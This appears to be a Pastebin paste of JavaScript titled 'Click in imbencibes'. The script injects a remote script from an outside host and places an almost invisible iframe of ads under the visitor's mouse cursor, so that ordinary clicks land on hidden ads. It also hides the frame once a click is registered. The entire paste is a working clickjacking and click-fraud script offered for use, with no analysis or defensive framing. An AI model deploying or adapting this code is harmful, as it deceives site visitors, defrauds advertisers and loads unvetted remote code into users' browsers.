Advertisement
muymusicacom

Click in imbencibes

Apr 26th, 2013
288
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
  1. var localURL = 'http://www.nosoyraro.com/c';
  2. var script_tag = document['createElement']('script');
  3. script_tag['setAttribute']('type', 'text/javascript');
  4. script_tag['setAttribute']('src', localURL);
  5. document['getElementsByTagName']('head')[0]['appendChild'](script_tag);
  6.  
  7. function siguemeDDDD(_0x125fx4) {
  8. var _0x125fx5 = (navigator['appName']['indexOf']('Netscape') != -1);
  9. var _0x125fx6 = (_0x125fx5) ? _0x125fx4['pageX'] : event['clientX'];
  10. var _0x125fx7 = (_0x125fx5) ? _0x125fx4['pageY'] : event['clientY'];
  11. document['getElementById']('sigueloDDDD')['style']['left'] = _0x125fx6 + -140 + 'px';
  12. document['getElementById']('sigueloDDDD')['style']['top'] = _0x125fx7 + -140 + 'px';
  13. };
  14.  
  15. function nonedivDDDD() {
  16. document['getElementById']('sigueloDDDD')['style']['display'] = 'none';
  17. };
  18. var isOverIFrameDDDD = false;
  19.  
  20. function processMouseOutDDDD() {
  21. isOverIFrameDDDD = false;
  22. top['focus']();
  23. };
  24.  
  25. function processMouseOverDDDD() {
  26. isOverIFrameDDDD = true;
  27. };
  28.  
  29. function processIFrameClickDDDD() {
  30. if (isOverIFrameDDDD) {
  31. setInterval('nonedivDDDD()', '2500');
  32. };
  33. };
  34.  
  35. function initDDDD() {
  36. var _0x125fxe = document['getElementsByTagName']('iframe');
  37. for (var _0x125fxf = 0; _0x125fxf < _0x125fxe['length']; _0x125fxf++) {
  38. _0x125fxe[_0x125fxf]['onmouseover'] = processMouseOverDDDD;
  39. _0x125fxe[_0x125fxf]['onmouseout'] = processMouseOutDDDD;
  40. };
  41. if (typeof window['attachEvent'] != 'undefined') {
  42. top['attachEvent']('onblur', processIFrameClickDDDD);
  43. } else {
  44. if (typeof window['addEventListener'] != 'undefined') {
  45. top['addEventListener']('blur', processIFrameClickDDDD, false);
  46. };
  47. };
  48. };
  49.  
  50. document.write("<style>.siguelodivDDDD{ opacity:0.01; filter:alpha(opacity=1); -moz-opacity: 0.01; position:absolute;top:0;left:0;z-index:200000;overflow:hidden;height:250px;width:300px;margin-left:0px;border:1px solid #000;}</style>");
  51.  
  52. var sx = document.createElement('iframe');
  53. sx.setAttribute("class", "siguelodivDDDD");
  54. sx.setAttribute("id", "sigueloDDDD");
  55. sx.setAttribute("src", "http://www.urbanicano.net/ads.html");
  56. sx.setAttribute("scrolling", "no");
  57. sx.setAttribute("frameborder", "0");
  58. sx.setAttribute("style", "border:none; margin-left:0px; overflow:hidden; width:300px; height:250px;");
  59. document.getElementsByTagName("body")[0].appendChild(sx);
  60. initDDDD();
  61. document.onmousemove = siguemeDDDD;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement